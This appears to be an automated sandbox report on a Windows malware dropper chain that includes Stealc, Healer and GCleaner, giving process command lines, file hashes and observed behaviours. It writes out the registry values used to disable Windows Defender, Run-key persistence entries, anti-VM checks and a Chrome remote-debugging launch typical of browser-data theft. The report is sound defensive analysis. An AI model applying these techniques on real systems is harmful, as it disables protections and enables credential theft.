C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 508

C:\Users\Admin\AppData\Local\Temp\10062900101\aa27374f64.exe

"C:\Users\Admin\AppData\Local\Temp\10062900101\aa27374f64.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6ba9758,0x7fef6ba9768,0x7fef6ba9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1412 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2280 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2288 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1504 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1584 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1344 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3612 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:8

Network


Files


C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 9b1c99d5245940563e9e81e95c4832ec
SHA1 1bc5970a797d7160879f1ab93559a23b736a2ce7
SHA256 5e5e2d6ab15529a13c5f6fddf4908f82199df64cd0fff65ec624e324f6f20a45
SHA512 6d270d67927d391ddb39f5f2c3bbcbe36add45dc5cbf35099b0876b1b1c91f7ff23389e564bdf583fb4245984cd0a8af8f75ef87695296a8dc1d91269763b957

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000009.dbtmp

MD5 979c29c2917bed63ccf520ece1d18cda
SHA1 65cd81cdce0be04c74222b54d0881d3fdfe4736c
SHA256 b3524365a633ee6d1fa9953638d2867946c515218c497a5ec2dbef7dc44a7c53
SHA512 e38f694fd6ab9f678ae156528230d7a8bfb7b59a13b227f59f9c38ab5617db11ebb6be1276323a905d09c4066a3fe820cf58077ab48bf201f3c467a98516ee7a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000010.dbtmp

MD5 60e3f691077715586b918375dd23c6b0
SHA1 476d3eab15649c40c6aebfb6ac2366db50283d1b
SHA256 e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee
SHA512 d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e

memory/2280-1516-0x0000000000400000-0x0000000000856000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-02 02:18

Reported

2025-03-02 02:21

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe"

Signatures

Detects Healer, an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Stealc

stealer stealc

Stealc family

stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a16b636c8b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062720101\\a16b636c8b.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062730121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\26d8edfd34.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062940101\\26d8edfd34.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f33a39d263.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062950101\\f33a39d263.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5d8a752ab6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062960101\\5d8a752ab6.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\108a92f678.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10062970101\\108a92f678.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\ntlogsystem.bin C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
